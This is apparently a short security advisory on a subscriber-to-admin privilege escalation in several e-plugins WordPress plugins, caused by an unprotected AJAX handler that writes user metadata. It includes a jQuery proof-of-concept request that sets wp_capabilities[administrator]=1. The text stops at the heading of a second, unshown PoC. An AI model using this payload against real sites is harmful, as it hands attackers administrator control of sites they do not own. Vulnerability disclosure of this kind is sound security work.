Multiple e-plugins - Subscriber+ Privilege Escalation

The plugins, sold by the same developer (e-plugins), do not implementing any security measures in some AJAX calls. For example in the file plugin.php, the function iv_directories_update_profile_setting() uses update_user_meta with any data provided by the ajax call, which can be used to give the logged in user admin capabilities. Since the plugins allow user registration via a custom form (even if the blog does not allow users to register) it makes any site using it vulnerable.

PoC

directory-pro (set current logged in user to admin) jQuery.ajax({ url: “http://localhost/wp-admin/admin-ajax.php”, method: ‘post’, data: { action: “iv_directories_update_profile_setting”, form_data: wp_capabilities[administrator]=1 }, success: function(res){ console.log(res) } }); finaluser (edit user to set as admin):